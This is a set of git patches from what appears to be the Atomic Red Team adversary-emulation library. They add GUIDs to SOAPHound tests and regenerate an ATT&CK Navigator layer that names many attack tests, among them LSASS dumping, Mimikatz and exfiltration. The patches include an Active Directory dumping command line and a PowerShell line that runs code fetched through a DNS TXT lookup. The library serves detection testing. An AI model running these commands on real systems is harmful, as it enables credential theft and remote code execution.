insertions(+) diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index a91f37080e..9ce5f76470 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml @@ -406,6 +406,7 @@ atomic_tests: powershell .(nslookup -q=txt example.com 8.8.8.8)[-1] name: powershell - name: SOAPHound - Dump BloodHound Data + auto_generated_guid: 6a5b2a50-d037-4879-bf01-43d4d6cbf73f description: | Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory. src: https://github.com/FalconForceTeam/SOAPHound @@ -445,6 +446,7 @@ atomic_tests: #{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory} name: powershell - name: SOAPHound - Build Cache + auto_generated_guid: 4099086c-1470-4223-8085-8186e1ed5948 description: | Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename. src: https://github.com/FalconForceTeam/SOAPHound 
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 216d02fe27..df2704ee2d 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -1559,3 +1559,5 @@ a4420f93-5386-4290-b780-f4f66abc7070
 0128e48e-8c1a-433a-a11a-a5304734f1e1
 eea0a6c2-84e9-4e8c-a242-ac585d28d0d1
 0e7b8a4b-2ca5-4743-a9f9-96051abb6e50
+6a5b2a50-d037-4879-bf01-43d4d6cbf73f
+4099086c-1470-4223-8085-8186e1ed5948
From 77a44aea50ddfd9bbb37932a17321f6ec7fdb1a4 Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator
Date: Thu, 22 Feb 2024 17:37:16 +0000
Subject: [PATCH 05/41] Generated docs from job=generate-docs branch=master [ci skip]
---
 .../art-navigator-layer-windows.json | 2 +-
 .../art-navigator-layer.json | 2 +-
 atomics/Indexes/Indexes-CSV/index.csv | 2 +
 atomics/Indexes/Indexes-CSV/windows-index.csv | 2 +
 atomics/Indexes/Indexes-Markdown/index.md | 2 +
 .../Indexes/Indexes-Markdown/windows-index.md | 2 +
 atomics/Indexes/index.yaml | 77 +++++++++++++++++
 atomics/Indexes/windows-index.yaml | 77 +++++++++++++++++
 atomics/T1059.001/T1059.001.md | 83 +++++++++++++++++++
 9 files changed, 247 insertions(+), 2 deletions(-)
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index 2fbf9f9c01..4a2df1ccf1 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@ -{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump 
volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with 
ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl 
windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via 
Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":31,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":20,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- 
Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- 
Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - 